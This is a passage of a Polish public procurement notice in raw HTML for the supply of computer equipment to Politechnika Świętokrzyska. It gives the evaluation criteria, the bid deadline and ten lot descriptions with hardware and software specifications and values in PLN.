                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofert</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w zakresie przedmiotu zamówienia, w sytuacji gdy urządzenia wchodzące w jego zakres zostaną wycofane z rynku przez producenta, a wykonawca zaproponuje urządzenia o takich samych lub lepszych parametrach jak wymagane w opisie przedmiotu zamówienia bez zmiany ceny.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/11/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (urządzenie wielofunkcyjne)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego urządzenia wielofunkcyjnego(Drukowanie mono i kolor, kopiowanie, skanowanie i faksowanie, Rozdzielczość druku do 2 400 x 1200 dpi, Funkcje: Kolorowy wydruk, kopiowanie, skanowanie, Szybkość (druk MONO) Do 34 str./min. w formacie A4, Szybkość (druk kolorowy) Do 34 str./min. w formacie A4, Rozdzielczość druku w czerni: 1200x1200 dpi przy użyciu czarnego atramentu pigmentowego, Rozdzielczość druku w kolorze: maksymalna rozdzielczość zoptymalizowana 4800 x 1200 dpi dla papieru fotograficznego HP Premium Plus przy rozdzielczości wejściowej 1200 x 1200 dpi), Czas wydruku pierwszej strony: do 13 sek., prędkość kopiowania w kolorze (tryb draft, A4): do 34 kopii/min, Metoda druku: Druk termoatramentowy z dozowaniem kropli, regulowanym według potrzeb, Języki urządzenia: Rozszerzony HP PCL 3, Komunikacja: MIN. USB 2.0, Ethernet, sieć bezprzewodowa WiFi 802.11b/g/n, 2 porty modemowe RJ-11; Dodatkowe funkcje: DUPLEX (automatyczny druk dwustronny), ADF (automatyczny podajnik dokumentów do skanera), automatyczne skanowanie / kopiowanie dwustronne, faks (możliwość wysyłania/odbierania faksów), wyświetlacz). Sztuk 1<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  900<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Microsoft Office 2016 64 bit Professional MOLP)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego oprogramowania Microsoft Office 2016 64 bit Professional MOLP (wymagane programy: Word, Excel, Power Point, Outlook, OneNote, Publisher, Access), liczba stanowisk 2. Licencja 1<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  813.01<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Dysk zewnętrzny)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego dysku zewnętrznęgo: Pojemność: 2TB, Format: 2.5'', Interfejs: USB 3.0, Dysk twardy, technologia Plug &amp; Play, szybkość transferu danych 4.8 Gb/s, wyposażony w oprogramowanie AutoBackup, Secure Manager, SecretZone. Sztuk 1<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  325.20<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Dysk twardy)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowych dysków twardych o pojemności 2 TB (2048 GB) wraz z obudową i własnym zasilaniem. Dyski muszą mieć możliwość podłączenia przez złącze USB 3.0 oraz możliwość zamontowania wewnątrz obudowy komputera. Parametry: Rozmiar 3,5'' (3,5 cala), pojemność 2TB (2048GB), USB 3.0, własne zasilanie, obudowa. Sztuk 4<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  1300.81<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Tablet, Etui ochronne, Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level, Słownik Collins - wersja jednostanowiskowa (polsko-angielski i angielsko-polski))<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego Tabletu (Procesor co najmniej 8 rdzeniowy, taktowanie 1,9 GHz, 1.3 GHz; Wyświetlacz Wielkość wyświetlacza 10.5", rozdzielczość wyświetlacza minimum 2560x1600 (WQXGA), technologia sAMOLED; Pamięć Wielkość RAM - Min. 3 GB,  ROM - min. 16 GB, Zewnętrzna pamięc Micro SD do 128 GB; Czujniki Akcelerometr, Czytnik linii papilarnych, Czujnik żyroskopowy, Czujnik geometryczny, Czujnik pola magnetycznego, Czujnik RGB; Aparat Rozdzielczość aparatu - min. 8.0 Mpx; Sieć Wi-Fi; Łączność Wi-Fi 802.11 b/g/n/Ac ANT+, Usb 20, GPS, gniazdo słuchawkowe 3.5 mm Stereo, MHL, Wi-Fi: 802.11 a/b/g/n/ac 2.4G+5GHz, VHT80 MIMO, Wi-Fi Direct; System Android; Bateria minimum, 7900 mAh, (pożądane zastosowanie wzmocnionej bateri do około 10 000 mAh); Format odtwarzania wideo MP4, M4V, 3GP, 3G2, WMV, ASF, AVI, FLV, MKV, WEBM; Format odtwarzania audio MP3, M4A, 3GA, AAC, OGG, OGA, WAV, WMA, AMR, AWB, FLAC, MID, MIDI, XMF, MXMF, IMY, RTTTL, RTX, OTA; Rozdzielczość odtwarzania wideo WQHD (2560 x 1440), 30 klatek/sekundę; Wymiary max. Głębokość 228 mm, Waga, Max500 g , Dołączone akcesoria: Zasilacz, Sztuk 1), Etui ochronnego (skóra naturalna, sztuk 1), Oprogramowania (Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level, 2 licencje), Słownika Collins- wersja jednostanowiskowa (polsko-angielski i angielsko-polski, System: Win 10, 8/8.1, 7, Vista, 2000/XP, min. Explorer 5.5, 2 licencje).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  3089.43<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego oprogramowania: Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  406.50<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Komputer stacjonarny typuAll in One, Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License no Level, Urządzenie wielofunkcyjne, Komputer przenośny)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego Komputera stacjonarnego typu All In One (Przekątna ekranu 23,8 ; Ekran dotykowy; Procesor o parametrach nie niższych niż  2.7 GHz, 3.3 GHz Turbo, 6 MB Cache, 65W; Pamięć RAM DDR4 8GB; Dysk twardy o pojemności 1000GB SATA III; Nagrywarka DVD-RW; Karta grafiki o wydajności w teście Average G3D Mark co najmniej 1020 punktów (dla GT930A); Pamięć karty graficznej  2GB; Czytnik kart pamięci 6- in  1 (wbudowany); Złącza : 2xUSB 2.0, 3x USB 3.0, 1x HDMI (wejście, wyjście); Karta WiFi  w standardzie IEEE 802.11 ac; bezprzewodowa klawiatura i mysz; Bluetooth; Kamera internetowa 3D; Wbudowane głośniki, mikrofon; Wymiary nie większe niż 580 x 470 x 215 mm; Waga nie większa niż 8.2 kg; Kolor czarny; System operacyjny równoważny Windows 10 64-bit, Sztuk 1), Oprogramowania (Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level, 1 licencja), Urządzenia wielofunkcyjnego (Technologia druku laserowa kolorowa, maks. rozmiar nośnika A4, rozdzielczość druku w czerni 600 x 600 dpi , rozdzielczość druku w kolorze 600 x 600 dpi, maks. szybkość druku mono 20 str./min. maks. szybkość druku kolor 20 str./min., druk dwustronny [dupleks] tak, gramatura papieru 60 - 176 g/m (do 220 g/m w przypadku kartek pocztowych i błyszczącego papieru fotograficznego HP Color Laser), praca w sieci [serwer druku] tak, typ skanera płaski i automatyczny podajnik dokumentów (ADF), rozdzielczość skanera 1200 x 1200 dpi, obszar skanowania 216 x 297 mm (ADF: 216mm x 356mm), szybkość kopiarki w czerni 20 str./min., szybkość kopiarki w kolorze 20 str./min., rozdzielczość kopiarki 300 x 420 dpi, pojemność pamięci faksu 250 str., szybkość transmisji faksu 33.6 kbps, rozdzielczość faksu 203 x 196 dpi, interfejs Ethernet 10/100/1000 Mbps, USB 2.0 szerokość max. 420 mm, głębokość max. 694 mm , wysokość max. 500 mm , waga max. 28.9 kg, normatywne obciążenie 40000 str./mies. (zalecane 1000 - 2500), Sztuk 1), Komputera przenośnego (przekątna ekranu LCD 13.3 cali, nominalna rozdzielczość LCD 1366 x 768 pikseli, powłoka ekranu antyrefleksyjna , procesor Intel Core i3 lub równoważny(model procesora i3-6100U (2.3 GHz, 3 MB Cache), ilość rdzeni 2 szt., wielkość pamięci RAM 4 GB, typ zastosowanej pamięci RAM DDR3 (1600 MHz) wolne gniazda pamięci 1 szt. , rodzaj dysku twardego magnetyczny (tradycyjny) pojemność dysku magnetycznego 500 GB (7200 RPM), napęd optyczny brak, karta graficzna Intel HD Graphics 520 , ocena wydajności chipsetu karty graficznej 120 pkt, wyjścia karty graficznej 1 x wyjście HDMI, 1 x wyjście D-Sub, typ akumulatora 4-komorowy , karta dźwiękowa stereo, czytnik kart pamięci SDXC, SD, SDHC , komunikacja Bluetooth, WiFi IEEE 802.11b/g/n/ac, LAN 1 Gbps, interfejsy 1 x USB, 2 x USB 3.0, dodatkowe wyposażenie/funkcjonalność wbudowany mikrofon, czytnik linii papilarnych, kamera HD, zainstalowany system operacyjny brak systemu w komplecie, szerokość max. 326 mm, głębokość max. 233 mm. Wysokość max. 20 mm, waga max.1.5 kg, kolor ramki wyświetlacza LCD  czarny, kolor klawiatury czarny, kolor wokół klawiatury srebrny, Sztuk 1).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  6349.60<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Komputer przenośny, Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego Komputera przenośnego (Procesor co najmniej 2 rdzenie, od 2.50 GHz do 3.10 GHz, 4 MB cache, Chipset Intel Skylake; Pamięć RAM 16 GB (SO-DIMM DDR3, 1600 MHz), Maksymalna obsługiwana ilość pamięci RAM 16 GB , Ilość gniazd pamięci (ogółem / wolne) 2/0; Dysk twardy 240 GB SSD SATA III 1000 GB SATA 5400 obr. (zewnętrzny, w obudowie), Wbudowane napędy optyczne Nagrywarka DVD+/-RW DualLayer, Typ ekranu Matowy, LED, Przekątna ekranu, 17,3", Rozdzielczość ekranu 1920 x 1080 (FullHD), Karta graficzna Minimum 4096 MB GDDR3, Dźwięk Zintegrowana karta dźwiękowa zgodna z Intel High Definition Audio Wbudowany mikrofon Wbudowane głośniki stereo, Kamera internetowa 1.0 Mpix ; Łączność Wi-Fi 802.11 b/g/n/ac, Moduł Bluetooth Intel Wireless Display (WiDi) LAN 10/100 Mbps, Rodzaje wejść / wyjść Czytnik kart pamięci - 1 szt. Wyjście słuchawkowe/wejście mikrofonowe - 1 szt. USB 3.1 Gen. 1 (USB 3.0) - 1 szt. USB 2.0 - 2 szt. RJ-45 (LAN) - 1 szt., HDMI - 1 szt., DC-in (wejście zasilania) - 1 szt.; Bateria 4-komorowa, 2700 mAh, Li-Ion; Zainstalowany system operacyjny Microsoft Windows 10 Home PL (wersja 64-bitowa); Dołączone oprogramowanie Partycja recovery (opcja przywrócenia systemu z dysku); Wysokość 23,5 mm max, Szerokość 440 mm max, Głębokość 228 mm max, Waga 3,35 kg (z baterią) max, Dodatkowe informacje Możliwość zabezpieczenia linką (port Kensington Lock), Wielodotykowy, intuicyjny touchpad Podświetlana klawiatura Wydzielona klawiatura numeryczna, Dołączone akcesoria Bateria (podstawowa) Zasilacz Torba dedykowana, Mysz laserowa bezprzewodowa, Sztuk 1), Oprogramowania (Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level, 1 Licencja).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  3089.43<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Komputer przenośny, MicrosoftOffice Professional Plus 2016 Sngl Academic OPEN 1 License No Level)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego Komputera przenośnego (Ekran 15,6, procesor N3700 (4 rdzenie, 1.60 GHz, 2 MB cache) lub równoważny, pamięć 4 GB (SO-DIMM DDR3, 1600 MHz), dysk: 1000 GB SATA 5400 obr., DVD+/-RW DualLayer, Karta graficzna: Intel HD Graphics lub równoważny, Microsoft Windows 10 Home PL (wersja 64-bitowa), Łączność: Moduł Bluetooth, LAN 10/100 Mbps, Wi-Fi 802.11 b/g/n, Czytnik kart pamięci, Złącza: USB (3 sztuki), HDMI, VGA, RJ-45 (LAN), DC-in (wejście zasilania), Wyjście słuchawkowe/wejście mikrofonowe, Bateria 3-komorowa, 3000mAh, Li-Ion, Partycja recovery,  Waga max. 2 kg, Sztuk 1), Oprogramowania (Microsoft Office Professional Plus 2016 Sngl Academic OPEN 1 License No Level, 1 licencja).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  1426.02<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Dostwa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Komputer przenośny)<br /><div style="padding-left: 20px"><b>
